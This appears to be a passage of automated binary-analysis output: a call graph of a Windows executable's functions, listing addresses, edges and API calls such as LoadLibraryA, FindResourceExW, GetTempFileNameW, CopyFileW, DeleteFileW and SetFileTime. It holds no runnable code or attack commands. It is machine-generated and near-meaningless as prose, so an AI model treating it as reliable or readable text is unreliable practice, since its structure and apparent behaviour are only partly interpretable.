88 API calls 4 library calls 94180->94223 94181 503939 ___crtGetEnvironmentStringsW 94222 4d26bc 88 API calls 4 library calls 94181->94222 94182 49bcce 48 API calls 94190 49b495 94182->94190 94183 49ba85 48 API calls 94183->94190 94185 49b9e4 94225 4d26bc 88 API calls 4 library calls 94185->94225 94187 503973 94187->94177 94190->94175 94190->94180 94190->94181 94190->94182 94190->94183 94190->94185 94193 503909 94190->94193 94198 49bdfa 48 API calls 94190->94198 94209 49c413 59 API calls 94190->94209 94210 49bb85 94190->94210 94215 49bc74 48 API calls 94190->94215 94217 49c6a5 49 API calls 94190->94217 94218 49c799 48 API calls ___crtGetEnvironmentStringsW 94190->94218 94191 503989 94224 49ba85 48 API calls ___crtGetEnvironmentStringsW 94191->94224 94219 496b4a 94193->94219 94196 503914 94200 4af4ea 48 API calls 94196->94200 94199 49b66c CharUpperBuffW 94198->94199 94199->94190 94200->94181 94201->93798 94202->94165 94203->94165 94205 4af4ea 48 API calls 94204->94205 94206 496b34 94205->94206 94207 496b4a 48 API calls 94206->94207 94208 496b43 94207->94208 94208->94190 94209->94190 94211 49bb9b 94210->94211 94214 49bb96 ___crtGetEnvironmentStringsW 94210->94214 94212 501b77 94211->94212 94213 4aee75 48 API calls 94211->94213 94213->94214 94214->94190 94215->94190 94216->94177 94217->94190 94218->94190 94220 4af4ea 48 API calls 94219->94220 94221 496b54 94220->94221 94221->94196 94222->94187 94223->94191 94224->94187 94225->94187 94317 494214 94226->94317 94231 504f73 94234 494252 84 API calls 94231->94234 94232 4941d4 LoadLibraryExW 94327 494291 94232->94327 94236 504f7a 94234->94236 94238 494291 3 API calls 94236->94238 94239 504f82 94238->94239 94353 4944ed 94239->94353 94240 4941fb 94240->94239 94241 494207 94240->94241 94243 494252 84 API calls 94241->94243 94245 49420c 94243->94245 94245->93811 94245->93812 94247 504fa9 94361 494950 94247->94361 94644 4b1e46 94250->94644 94254 4d6918 _wcschr __ftell_nolock 94253->94254 94255 4b1dfc __wsplitpath 47 API calls 94254->94255 94258 4d692e _wcscat _wcscpy 94254->94258 94256 4d695d 94255->94256 94257 4b1dfc __wsplitpath 47 API calls 94256->94257 94257->94258 94258->93832 94260 4dbfb1 __ftell_nolock 94259->94260 94261 4af4ea 48 API calls 94260->94261 94262 4dc00e 94261->94262 94263 4947b7 48 API calls 94262->94263 94264 4dc018 94263->94264 94265 4dbdb4 GetSystemTimeAsFileTime 94264->94265 94266 4dc023 94265->94266 94267 494517 83 API calls 94266->94267 94268 4dc036 _wcscmp 94267->94268 94269 4dc05a 94268->94269 94270 4dc107 94268->94270 94687 4dc56d 94269->94687 94272 4dc56d 94 API calls 94270->94272 94284 4dc0d3 _wcscat 94272->94284 94274 4b1dfc __wsplitpath 47 API calls 94279 4dc088 _wcscat _wcscpy 94274->94279 94275 4944ed 64 API calls 94277 4dc12c 94275->94277 94276 4dc110 94276->93837 94278 4944ed 64 API calls 94277->94278 94280 4dc13c 94278->94280 94282 4b1dfc __wsplitpath 47 API calls 94279->94282 94281 4944ed 64 API calls 94280->94281 94283 4dc157 94281->94283 94282->94284 94285 4944ed 64 API calls 94283->94285 94284->94275 94284->94276 94286 4dc167 94285->94286 94287 4944ed 64 API calls 94286->94287 94288 4dc182 94287->94288 94289 4944ed 64 API calls 94288->94289 94290 4dc192 94289->94290 94291 4944ed 64 API calls 94290->94291 94292 4dc1a2 94291->94292 94293 4944ed 64 API calls 94292->94293 94294 4dc1b2 94293->94294 94670 4dc71a GetTempPathW GetTempFileNameW 94294->94670 94296 4dc1be 94297 4b3499 117 API calls 94296->94297 94308 4dc1cf 94297->94308 94298 4dc289 94299 4b35e4 __fcloseall 83 API calls 94298->94299 94300 4dc294 94299->94300 94302 4dc2ae 94300->94302 94303 4dc29a DeleteFileW 94300->94303 94301 4944ed 64 API calls 94301->94308 94304 4dc342 CopyFileW 94302->94304 94309 4dc2b8 94302->94309 94303->94276 94305 4dc358 DeleteFileW 94304->94305 94306 4dc36a DeleteFileW 94304->94306 94305->94276 94684 4dc6d9 CreateFileW 94306->94684 94308->94276 94308->94298 94308->94301 94671 4b2aae 94308->94671 94693 4db965 94309->94693 94313 4dc331 DeleteFileW 94313->94276 94314->93801 94315->93822 94316->93829 94366 494339 94317->94366 94320 49423c 94322 4941bb 94320->94322 94323 494244 FreeLibrary 94320->94323 94324 4b3499 94322->94324 94323->94322 94374 4b34ae 94324->94374 94326 4941c8 94326->94231 94326->94232 94453 4942e4 94327->94453 94330 4942b8 94332 4941ec 94330->94332 94333 4942c1 FreeLibrary 94330->94333 94334 494380 94332->94334 94333->94332 94335 4af4ea 48 API calls 94334->94335 94336 494395 94335->94336 94461 4947b7 94336->94461 94338 4943a1 ___crtGetEnvironmentStringsW 94339 4943dc 94338->94339 94341 494499 94338->94341 94342 4944d1 94338->94342 94340 494950 57 API calls 94339->94340 94346 4943e5 94340->94346 94464 49406b CreateStreamOnHGlobal 94341->94464 94475 4dc750 93 API calls 94342->94475 94345 4944ed 64 API calls 94345->94346 94346->94345 94348 494479 94346->94348 94349 504ed7 94346->94349 94470 494517 94346->94470 94348->94240 94350 494517 83 API calls 94349->94350 94351 504eeb 94350->94351 94352 4944ed 64 API calls 94351->94352 94352->94348 94354 504fc0 94353->94354 94355 4944ff 94353->94355 94493 4b381e 94355->94493 94358 4dbf5a 94621 4dbdb4 94358->94621 94360 4dbf70 94360->94247 94362 505002 94361->94362 94363 49495f 94361->94363 94626 4b3e65 94363->94626 94365 494967 94370 49434b 94366->94370 94369 494321 LoadLibraryA GetProcAddress 94369->94320 94371 49422f 94370->94371 94372 494354 LoadLibraryA 94370->94372 94371->94320 94371->94369 94372->94371 94373 494365 GetProcAddress 94372->94373 94373->94371 94377 4b34ba type_info::_Type_info_dtor 94374->94377 94375 4b34cd 94422 4b7c0e 47 API calls __getptd_noexit 94375->94422 94377->94375 94379 4b34fe 94377->94379 94378 4b34d2 94423 4b6e10 8 API calls _xtow_s@20 94378->94423 94393 4be4c8 94379->94393 94382 4b3503 94383 4b3519 94382->94383 94384 4b350c 94382->94384 94386 4b3543 94383->94386 94387 4b3523 94383->94387 94424 4b7c0e 47 API calls __getptd_noexit 94384->94424 94407 4be5e0 94386->94407 94425 4b7c0e 47 API calls __getptd_noexit 94387->94425 94389 4b34dd type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 94389->94326 94394 4be4d4 type_info::_Type_info_dtor 94393->94394 94395 4b7cf4 __lock 47 API calls 94394->94395 94396 4be4e2 94395->94396 94397 4be559 94396->94397 94404 4b7d7c __mtinitlocknum 47 API calls 94396->94404 94405 4be552 94396->94405 94430 4b4e5b 48 API calls __lock 94396->94430 94431 4b4ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 94396->94431 94432 4b69d0 47 API calls __crtCompareStringA_stat 94397->94432 94400 4be560 94401 4be56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 94400->94401 94400->94405 94401->94405 94403 4be5cc type_info::_Type_info_dtor 94403->94382 94404->94396 94427 4be5d7 94405->94427 94416 4be600 __wopenfile 94407->94416 94408 4be61a 94437 4b7c0e 47 API calls __getptd_noexit 94408->94437 94410 4be7d5 94410->94408 94414 4be838 94410->94414 94411 4be61f 94438 4b6e10 8 API calls _xtow_s@20 94411->94438 94413 4b354e 94426 4b3570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 94413->94426 94434 4c63c9 94414->94434 94416->94408 94416->94410 94416->94416 94439 4b185b 59 API calls 2 library calls 94416->94439 94418 4be7ce 94418->94410 94440 4b185b 59 API calls 2 library calls 94418->94440 94420 4be7ed 94420->94410 94441 4b185b 59 API calls 2 library calls 94420->94441 94422->94378 94423->94389 94424->94389 94425->94389 94426->94389 94433 4b7e58 RtlLeaveCriticalSection 94427->94433 94429 4be5de 94429->94403 94430->94396 94431->94396 94432->94400 94433->94429 94442 4c5bb1 94434->94442 94436 4c63e2 94436->94413 94437->94411 94438->94413 94439->94418 94440->94420 94441->94410 94443 4c5bbd type_info::_Type_info_dtor 94442->94443 94444 4c5bcf 94443->94444 94446 4c5c06 94443->94446 94445 4b7c0e _xtow_s@20 47 API calls 94444->94445 94447 4c5bd4 94445->94447 94448 4c5c78 __wsopen_helper 110 API calls 94446->94448 94449 4b6e10 _xtow_s@20 8 API calls 94447->94449 94450 4c5c23 94448->94450 94452 4c5bde type_info::_Type_info_dtor 94449->94452 94451 4c5c4c __wsopen_helper RtlLeaveCriticalSection 94450->94451 94451->94452 94452->94436 94457 4942f6 94453->94457 94456 4942cc LoadLibraryA GetProcAddress 94456->94330 94458 4942aa 94457->94458 94459 4942ff LoadLibraryA 94457->94459 94458->94330 94458->94456 94459->94458 94460 494310 GetProcAddress 94459->94460 94460->94458 94462 4af4ea 48 API calls 94461->94462 94463 4947c9 94462->94463 94463->94338 94465 4940a2 94464->94465 94466 494085 FindResourceExW 94464->94466 94465->94339 94466->94465 94467 504f16 LoadResource 94466->94467 94467->94465 94468 504f2b SizeofResource 94467->94468 94468->94465 94469 504f3f LockResource 94468->94469 94469->94465 94471 494526 94470->94471 94474 504fe0 94470->94474 94476 4b3a8d 94471->94476 94473 494534 94473->94346 94475->94339 94477 4b3a99 type_info::_Type_info_dtor 94476->94477 94478 4b3aa7 94477->94478 94479 4b3acd 94477->94479 94489 4b7c0e 47 API calls __getptd_noexit 94478->94489 94481 4b4e1c __lock_file 48 API calls 94479->94481 94483 4b3ad3 94481->94483 94482 4b3aac 94490 4b6e10 8 API calls _xtow_s@20 94482->94490 94491 4b39fe 81 API calls 4 library calls 94483->94491 94486 4b3ae2 94492 4b3b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 94486->94492 94488 4b3ab7 type_info::_Type_info_dtor 94488->94473 94489->94482 94490->94488 94491->94486 94492->94488 94496 4b3839 94493->94496 94495 494510 94495->94358 94497 4b3845 type_info::_Type_info_dtor 94496->94497 94498 4b3880 type_info::_Type_info_dtor 94497->94498 94499 4b385b _memset 94497->94499 94500 4b3888 94497->94500 94498->94495 94523 4b7c0e 47 API calls __getptd_noexit 94499->94523 94501 4b4e1c __lock_file 48 API calls 94500->94501 94502 4b388e 94501->94502 94509 4b365b 94502->94509 94505 4b3875 94524 4b6e10 8 API calls _xtow_s@20 94505->94524 94510 4b3691 94509->94510 94514 4b3676 _memset 94509->94514 94525 4b38c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 94510->94525 94511 4b3681 94617 4b7c0e 47 API calls __getptd_noexit 94511->94617 94513 4b3686 94618 4b6e10 8 API calls _xtow_s@20 94513->94618 94514->94510 94514->94511 94520 4b36cf 94514->94520 94517 4b37e0 _memset 94620 4b7c0e 47 API calls __getptd_noexit 94517->94620 94519 4b2933 __fseek_nolock 47 API calls 94519->94520 94520->94510 94520->94517 94520->94519 94526 4bee0e 94520->94526 94597 4beb66 94520->94597 94619 4bec87 47 API calls 3 library calls 94520->94619 94523->94505 94524->94498 94525->94498 94527 4bee2f 94526->94527 94528 4bee46 94526->94528 94530 4b7bda __dosmaperr 47 API calls 94527->94530 94529 4bf57e 94528->94529 94534 4bee80 94528->94534 94531 4b7bda __dosmaperr 47 API calls 94529->94531 94532 4bee34 94530->94532 94535 4bf583 94531->94535 94533 4b7c0e _xtow_s@20 47 API calls 94532->94533 94540 4bee3b 94533->94540 94536 4bee88 94534->94536 94543 4bee9f 94534->94543 94537 4b7c0e _xtow_s@20 47 API calls 94535->94537 94538 4b7bda __dosmaperr 47 API calls 94536->94538 94539 4bee94 94537->94539 94541 4bee8d 94538->94541 94542 4b6e10 _xtow_s@20 8 API calls 94539->94542 94540->94520 94547 4b7c0e _xtow_s@20 47 API calls 94541->94547 94542->94540 94543->94540 94544 4beeb4 94543->94544 94546 4beece 94543->94546 94549 4beeec 94543->94549 94545 4b7bda __dosmaperr 47 API calls 94544->94545 94545->94541 94546->94544 94548 4beed9 94546->94548 94547->94539 94552 4c3bf2 __flswbuf 47 API calls 94548->94552 94551 4b69d0 __malloc_crt 47 API calls 94549->94551 94553 4beefc 94551->94553 94554 4befed 94552->94554 94555 4bef1f 94553->94555 94556 4bef04 94553->94556 94557 4bf066 ReadFile 94554->94557 94560 4bf003 GetConsoleMode 94554->94560 94558 4bf82f __lseeki64_nolock 49 API calls 94555->94558 94559 4b7c0e _xtow_s@20 47 API calls 94556->94559 94562 4bf088 94557->94562 94563 4bf546 GetLastError 94557->94563 94561 4bef2d 94558->94561 94564 4bef09 94559->94564 94568 4bf063 94560->94568 94569 4bf017 94560->94569 94561->94548 94562->94563 94570 4bf058 94562->94570 94565 4bf046 94563->94565 94566 4bf553 94563->94566 94567 4b7bda __dosmaperr 47 API calls 94564->94567 94576 4b7bed __dosmaperr 47 API calls 94565->94576 94579 4bf04c 94565->94579 94571 4b7c0e _xtow_s@20 47 API calls 94566->94571 94572 4bef14 94567->94572 94568->94557 94569->94568 94573 4bf01d ReadConsoleW 94569->94573 94570->94579 94580 4bf32a 94570->94580 94583 4bf0bd 94570->94583 94574 4bf558 94571->94574 94572->94540 94573->94570 94575 4bf040 GetLastError 94573->94575 94577 4b7bda __dosmaperr 47 API calls 94574->94577 94575->94565 94576->94579 94577->94579 94578 4b1c9d _free 47 API calls 94578->94540 94579->94540 94579->94578 94580->94579 94584 4bf430 ReadFile 94580->94584 94582 4bf129 ReadFile 94585 4bf14a GetLastError 94582->94585 94595 4bf154 94582->94595 94583->94582 94590 4bf1aa 94583->94590 94589 4bf453 GetLastError 94584->94589 94596 4bf461 94584->94596 94585->94595 94586 4bf267 94591 4bf217 MultiByteToWideChar 94586->94591 94592 4bf82f __lseeki64_nolock 49 API calls 94586->94592 94587 4bf257 94588 4b7c0e _xtow_s@20 47 API calls 94587->94588 94588->94579 94589->94596 94590->94579 94590->94586 94590->94587 94590->94591 94591->94575 94591->94579 94592->94591 94593 4bf82f __lseeki64_nolock 49 API calls 94593->94595 94594 4bf82f __lseeki64_nolock 49 API calls 94594->94596 94595->94583 94595->94593 94596->94580 94596->94594 94598 4beb71 94597->94598 94601 4beb86 94597->94601 94599 4b7c0e _xtow_s@20 47 API calls 94598->94599 94600 4beb76 94599->94600 94602 4b6e10 _xtow_s@20 8 API calls 94600->94602 94603 4bebbb 94601->94603 94604 4c3e24 __getbuf 47 API calls 94601->94604 94609 4beb81 94601->94609 94602->94609 94605 4b2933 __fseek_nolock 47 API calls 94603->94605 94604->94603 94606 4bebcf 94605->94606 94607 4bed06 __filbuf 62 API calls 94606->94607 94608 4bebd6 94607->94608 94608->94609 94610 4b2933 __fseek_nolock 47 API calls 94608->94610 94609->94520 94611 4bebf9 94610->94611 94611->94609 94612 4b2933 __fseek_nolock 47 API calls 94611->94612 94613 4bec05 94612->94613 94613->94609 94614 4b2933 __fseek_nolock 47 API calls 94613->94614 94615 4bec12 94614->94615 94616 4b2933 __fseek_nolock 47 API calls 94615->94616 94616->94609 94617->94513 94618->94510 94619->94520 94620->94513 94624 4b344a GetSystemTimeAsFileTime 94621->94624 94623 4dbdc3 94623->94360 94625 4b3478 __aulldiv 94624->94625 94625->94623 94627 4b3e71 type_info::_Type_info_dtor 94626->94627 94628 4b3e7f 94627->94628 94629 4b3e94 94627->94629 94640 4b7c0e 47 API calls __getptd_noexit 94628->94640 94631 4b4e1c __lock_file 48 API calls 94629->94631 94633 4b3e9a 94631->94633 94632 4b3e84 94641 4b6e10 8 API calls _xtow_s@20 94632->94641 94642 4b3b0c 55 API calls 5 library calls 94633->94642 94636 4b3ea5 94643 4b3ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 94636->94643 94638 4b3eb7 94639 4b3e8f type_info::_Type_info_dtor 94638->94639 94639->94365 94640->94632 94641->94639 94642->94636 94643->94638 94645 4b1e61 94644->94645 94648 4b1e55 94644->94648 94668 4b7c0e 47 API calls __getptd_noexit 94645->94668 94647 4b2019 94653 4b1e41 94647->94653 94669 4b6e10 8 API calls _xtow_s@20 94647->94669 94648->94645 94659 4b1ed4 94648->94659 94663 4b9d6b 47 API calls _xtow_s@20 94648->94663 94651 4b1fa0 94651->94645 94651->94653 94655 4b1fb0 94651->94655 94652 4b1f5f 94652->94645 94654 4b1f7b 94652->94654 94665 4b9d6b 47 API calls _xtow_s@20 94652->94665 94653->93824 94654->94645 94654->94653 94658 4b1f91 94654->94658 94667 4b9d6b 47 API calls _xtow_s@20 94655->94667 94666 4b9d6b 47 API calls _xtow_s@20 94658->94666 94659->94645 94662 4b1f41 94659->94662 94664 4b9d6b 47 API calls _xtow_s@20 94659->94664 94662->94651 94662->94652 94663->94659 94664->94662 94665->94654 94666->94653 94667->94653 94668->94647 94669->94653 94670->94296 94672 4b2aba type_info::_Type_info_dtor 94671->94672 94673 4b2ae4 type_info::_Type_info_dtor 94672->94673 94674 4b2aec 94672->94674 94675 4b2ad4 94672->94675 94673->94308 94677 4b4e1c __lock_file 48 API calls 94674->94677 94736 4b7c0e 47 API calls __getptd_noexit 94675->94736 94679 4b2af2 94677->94679 94678 4b2ad9 94737 4b6e10 8 API calls _xtow_s@20 94678->94737 94724 4b2957 94679->94724 94685 4dc6ff SetFileTime CloseHandle 94684->94685 94686 4dc715 94684->94686 94685->94686 94686->94276 94689 4dc581 __tzset_nolock _wcscmp 94687->94689 94688 4944ed 64 API calls 94688->94689 94689->94688 94690 4dbf5a GetSystemTimeAsFileTime 94689->94690 94691 4dc05f 94689->94691 94692 494517 83 API calls 94689->94692 94690->94689 94691->94274 94691->94276 94692->94689 94694 4db97e 94693->94694 94695 4db970 94693->94695 94697 4db9c3 94694->94697 94698 4b3499 117 API calls 94694->94698 94719 4db987 94694->94719 94696 4b3499 117 API calls 94695->94696 94696->94694 94742 4dbbe8 94697->94742 94700 4db9a8 94698->94700 94700->94697 94702 4db9b1 94700->94702 94701 4dba07 94703 4dba2c 94701->94703 94704 4dba0b 94701->94704 94706 4b35e4 __fcloseall 83 API calls 94702->94706 94702->94719 94746 4db7e5 94703->94746 94705 4dba18 94704->94705 94708 4b35e4 __fcloseall 83 API calls 94704->94708 94712 4b35e4 __fcloseall 83 API calls 94705->94712 94705->94719 94706->94719 94708->94705 94710 4dba5a 94755 4dba8a 94710->94755 94711 4dba3a 94713 4dba47 94711->94713 94715 4b35e4 __fcloseall 83 API calls 94711->94715 94712->94719 94717 4b35e4 __fcloseall 83 API calls 94713->94717 94713->94719 94715->94713 94717->94719 94719->94306 94719->94313 94721 4dba75 94721->94719 94723 4b35e4 __fcloseall 83 API calls 94721->94723 94722 4b35e4 __fcloseall 83 API calls 94722->94721 94723->94719 94727 4b2966 94724->94727 94732 4b2984 94724->94732 94725 4b2974 94739 4b7c0e 47 API calls __getptd_noexit 94725->94739 94727->94725 94729 4b299c ___crtGetEnvironmentStringsW 94727->94729 94727->94732 94728 4b2979 94740 4b6e10 8 API calls _xtow_s@20 94728->94740 94729->94732 94733 4b2c84 __flush 78 API calls 94729->94733 94734 4b2933 __fseek_nolock 47 API calls 94729->94734 94735 4baf61 __flush 78 API calls 94729->94735 94741 4b8e63 78 API calls 7 library calls 94729->94741 94738 4b2b24 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 94732->94738 94733->94729 94734->94729 94735->94729 94736->94678 94737->94673 94738->94673 94739->94728 94740->94732 94741->94729 94743 4dbc0d 94742->94743 94745 4dbbf6 __tzset_nolock ___crtGetEnvironmentStringsW 94742->94745 94744 4b381e __fread_nolock 64 API calls 94743->94744 94744->94745 94745->94701 94747 4b395c __crtCompareStringA_stat 47 API calls 94746->94747 94748 4db7f4 94747->94748 94749 4b395c __crtCompareStringA_stat 47 API calls 94748->94749 94750 4db808 94749->94750 94751 4b395c __crtCompareStringA_stat 47 API calls 94750->94751 94752 4db81c 94751->94752 94753 4dbb64 47 API calls 94752->94753 94754 4db82f 94752->94754 94753->94754 94754->94710 94754->94711 94759 4dbaa0 94755->94759 94756 4dbb51 94775 4dbd8a 94756->94775 94758 4db841 64 API calls 94758->94759 94759->94756 94759->94758 94762 4dba61 94759->94762 94771 4dbc67 94759->94771 94779 4db942 64 API calls 94759->94779 94763 4dbb64 94762->94763 94764 4dbb71 94763->94764 94766 4dbb77 94763->94766 94765 4b1c9d _free 47 API calls 94764->94765 94765->94766 94767 4b1c9d _free 47 API calls 94766->94767 94769 4dbb88 94766->94769 94767->94769 94768 4b1c9d _free 47 API calls 94770 4dba68 94768->94770 94769->94768 94769->94770 94770->94721 94770->94722 94772 4dbc76 94771->94772 94773 4dbcb6 94771->94773 94772->94759 94773->94772 94780 4dbd3d 94773->94780 94776 4dbd97 94775->94776 94777 4dbda8 94775->94777 94778 4b2aae 80 API calls 94776->94778 94777->94762 94778->94777 94779->94759 94781 4dbd69 94780->94781 94782 4dbd7a 94780->94782 94783 4b2aae 80 API calls 94781->94783 94782->94773 94783->94782 94784->93567 94785->93567 94786->93569 94787->93569 94788->93561 94789->93555 94790->93568 94791->93582 94792->93582 94793->93581 94794->93598 94795->93604 94796 4b5dfd 94797 4b5e09 type_info::_Type_info_dtor 94796->94797 94833 4b7eeb GetStartupInfoW 94797->94833 94799 4b5e0e 94835 4b9ca7 GetProcessHeap 94799->94835 94801 4b5e66 94802 4b5e71 94801->94802 94920 4b5f4d 47 API calls 3 library calls 94801->94920 94836 4b7b47 94802->94836 94805 4b5e77 94806 4b5e82 __RTC_Initialize 94805->94806 94921 4b5f4d 47 API calls 3 library calls 94805->94921 94857 4bacb3 94806->94857 94809 4b5e91 94810 4b5e9d GetCommandLineW 94809->94810 94922 4b5f4d 47 API calls 3 library calls 94809->94922 94876 4c2e7d GetEnvironmentStringsW 94810->94876 94813 4b5e9c 94813->94810 94817 4b5ec2 94889 4c2cb4 94817->94889 94820 4b5ec8 94821 4b5ed3 94820->94821 94924 4b115b 47 API calls 3 library calls 94820->94924 94903 4b1195 94821->94903 94824 4b5edb 94825 4b5ee6 __wwincmdln 94824->94825 94925 4b115b 47 API calls 3 library calls 94824->94925 94907 493a0f 94825->94907 94828 4b5f09 94927 4b1186 47 API calls _doexit 94828->94927 94829 4b5efa 94829->94828 94926 4b13f1 47 API calls _doexit 94829->94926 94832 4b5f0e type_info::_Type_info_dtor 94834 4b7f01 94833->94834 94834->94799 94835->94801 94928 4b123a 30 API calls 2 library calls 94836->94928 94838 4b7b4c 94929 4b7e23 InitializeCriticalSectionAndSpinCount 94838->94929 94840 4b7b51 94841 4b7b55 94840->94841 94931 4b7e6d TlsAlloc 94840->94931 94930 4b7bbd 50 API calls 2 library calls 94841->94930 94844 4b7b5a 94844->94805 94845 4b7b67 94845->94841 94846 4b7b72 94845->94846 94932 4b6986 94846->94932 94849 4b7bb4 94940 4b7bbd 50 API calls 2 library calls 94849->94940 94852 4b7b93 94852->94849 94854 4b7b99 94852->94854 94853 4b7bb9 94853->94805 94939 4b7a94 47 API calls 4 library calls 94854->94939 94856 4b7ba1 GetCurrentThreadId 94856->94805 94858 4bacbf type_info::_Type_info_dtor 94857->94858 94859 4b7cf4 __lock 47 API calls 94858->94859 94860 4bacc6 94859->94860 94861 4b6986 __calloc_crt 47 API calls 94860->94861 94863 4bacd7 94861->94863 94862 4bad42 GetStartupInfoW 94870 4bae80 94862->94870 94873 4bad57 94862->94873 94863->94862 94864 4bace2 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 94863->94864 94864->94809 94865 4baf44 94949 4baf58 RtlLeaveCriticalSection _doexit 94865->94949 94867 4baec9 GetStdHandle 94867->94870 94868 4b6986 __calloc_crt 47 API calls 94868->94873 94869 4baedb GetFileType 94869->94870 94870->94865 94870->94867 94870->94869 94872 4baf08 InitializeCriticalSectionAndSpinCount 94870->94872 94871 4bada5 94871->94870 94874 4badd7 GetFileType 94871->94874 94875 4bade5 InitializeCriticalSectionAndSpinCount 94871->94875 94872->94870 94873->94868 94873->94870 94873->94871 94874->94871 94874->94875 94875->94871 94877 4c2e8e 94876->94877 94878 4b5ead 94876->94878 94950 4b69d0 47 API calls __crtCompareStringA_stat 94877->94950 94883 4c2a7b GetModuleFileNameW 94878->94883 94881 4c2eb4 ___crtGetEnvironmentStringsW 94882 4c2eca FreeEnvironmentStringsW 94881->94882 94882->94878 94884 4c2aaf _wparse_cmdline 94883->94884 94885 4b5eb7 94884->94885 94886 4c2ae9 94884->94886 94885->94817 94923 4b115b 47 API calls 3 library calls 94885->94923 94951 4b69d0 47 API calls __crtCompareStringA_stat 94886->94951 94888 4c2aef _wparse_cmdline 94888->94885 94890 4c2ccd __wsetenvp 94889->94890 94894 4c2cc5 94889->94894 94891 4b6986 __calloc_crt 47 API calls 94890->94891 94899 4c2cf6 __wsetenvp 94891->94899 94892 4c2d4d 94893 4b1c9d _free 47 API calls 94892->94893 94893->94894 94894->94820 94895 4b6986 __calloc_crt 47 API calls 94895->94899 94896 4c2d72 94898 4b1c9d _free 47 API calls 94896->94898 94898->94894 94899->94892 94899->94894 94899->94895 94899->94896 94900 4c2d89 94899->94900 94952 4c2567 47 API calls _xtow_s@20 94899->94952 94953 4b6e20 IsProcessorFeaturePresent 94900->94953 94902 4c2d95 94902->94820 94904 4b11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94903->94904 94906 4b11e0 __IsNonwritableInCurrentImage 94904->94906 94968 4b0f0a 52 API calls __cinit 94904->94968 94906->94824 94908 493a29 94907->94908 94909 501ebf 94907->94909 94910 493a63 74E4C8D0 94908->94910 94969 4b1405 94910->94969 94914 493a8f 94981 493adb SystemParametersInfoW SystemParametersInfoW 94914->94981 94916 493a9b 94982 493d19 94916->94982 94918 493aa3 SystemParametersInfoW 94919 493ac8 94918->94919 94919->94829 94920->94802 94921->94806 94922->94813 94926->94828 94927->94832 94928->94838 94929->94840 94930->94844 94931->94845 94935 4b698d 94932->94935 94934 4b69ca 94934->94849 94938 4b7ec9 TlsSetValue 94934->94938 94935->94934 94936 4b69ab Sleep 94935->94936 94941 4c30aa 94935->94941 94937 4b69c2 94936->94937 94937->94934 94937->94935 94938->94852 94939->94856 94940->94853 94942 4c30b5 94941->94942 94944 4c30d0 __calloc_impl 94941->94944 94943 4c30c1 94942->94943 94942->94944 94948 4b7c0e 47 API calls __getptd_noexit 94943->94948 94945 4c30e0 RtlAllocateHeap 94944->94945 94947 4c30c6 94944->94947 94945->94944 94945->94947 94947->94935 94948->94947 94949->94864 94950->94881 94951->94888 94952->94899 94954 4b6e2b 94953->94954 94959 4b6cb5 94954->94959 94958 4b6e46 94958->94902 94960 4b6ccf _memset __call_reportfault 94959->94960 94961 4b6cef IsDebuggerPresent 94960->94961 94967 4b81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94961->94967 94963 4ba70c __except1 6 API calls 94964 4b6dd6 94963->94964 94966 4b8197 GetCurrentProcess TerminateProcess 94964->94966 94965 4b6db3 __call_reportfault 94965->94963 94966->94958 94967->94965 94968->94906 94970 4b7cf4 __lock 47 API calls 94969->94970 94971 4b1410 94970->94971 95034 4b7e58 RtlLeaveCriticalSection 94971->95034 94973 493a88 94974 4b146d 94973->94974 94975 4b1491 94974->94975 94976 4b1477 94974->94976 94975->94914 94976->94975 95035 4b7c0e 47 API calls __getptd_noexit 94976->95035 94978 4b1481 95036 4b6e10 8 API calls _xtow_s@20 94978->95036 94980 4b148c 94980->94914 94981->94916 94983 493d26 __ftell_nolock 94982->94983 94984 49d7f7 48 API calls 94983->94984 94985 493d31 GetCurrentDirectoryW 94984->94985 95037 4961ca 94985->95037 94987 493d57 IsDebuggerPresent 94988 501cc1 MessageBoxA 94987->94988 94989 493d65 94987->94989 94991 501cd9 94988->94991 94990 493e3a 94989->94990 94989->94991 94992 493d82 94989->94992 94993 493e41 SetCurrentDirectoryW 94990->94993 95171 4ac682 48 API calls 94991->95171 95111 4940e5 94992->95111 94996 493e4e Mailbox 94993->94996 94996->94918 94997 501ce9 95002 501cff SetCurrentDirectoryW 94997->95002 94999 493da0 GetFullPathNameW 95002->94996 95034->94973 95035->94978 95036->94980 95199 4ae99b 95037->95199 95041 4961eb 95042 495374 50 API calls 95041->95042 95043 4961ff 95042->95043 95044 49ce19 48 API calls 95043->95044 95045 49620c 95044->95045 95216 4939db 95045->95216 95047 496216 Mailbox 95048 496eed 48 API calls 95047->95048 95049 49622b 95048->95049 95228 499048 95049->95228 95052 49ce19 48 API calls 95053 496244 95052->95053 95054 49d6e9 55 API calls 95053->95054 95055 496254 Mailbox 95054->95055 95056 49ce19 48 API calls 95055->95056 95057 49627c 95056->95057 95058 49d6e9 55 API calls 95057->95058 95059 49628f Mailbox 95058->95059 95060 49ce19 48 API calls 95059->95060 95061 4962a0 95060->95061 95062 49d645 53 API calls 95061->95062 95063 4962b2 Mailbox 95062->95063 95064 49d7f7 48 API calls 95063->95064 95065 4962c5 95064->95065 95231 4963fc 95065->95231 95069 4962df 95070 4962e9 95069->95070 95071 501c08 95069->95071 95073 4b0fa7 _W_store_winword 59 API calls 95070->95073 95072 4963fc 48 API calls 95071->95072 95074 501c1c 95072->95074 95075 4962f4 95073->95075 95078 4963fc 48 API calls 95074->95078 95075->95074 95076 4962fe 95075->95076 95077 4b0fa7 _W_store_winword 59 API calls 95076->95077 95079 496309 95077->95079 95080 501c38 95078->95080 95079->95080 95081 496313 95079->95081 95083 495374 50 API calls 95080->95083 95082 4b0fa7 _W_store_winword 59 API calls 95081->95082 95084 49631e 95082->95084 95085 501c5d 95083->95085 95086 49635f 95084->95086 95089 501c86 95084->95089 95092 4963fc 48 API calls 95084->95092 95087 4963fc 48 API calls 95085->95087 95086->95089 95090 49636c 95086->95090 95088 501c69 95087->95088 95091 496eed 48 API calls 95088->95091 95093 496eed 48 API calls 95089->95093 95247 4ac050 95090->95247 95094 501c77 95091->95094 95095 496342 95092->95095 95096 501ca8 95093->95096 95099 4963fc 48 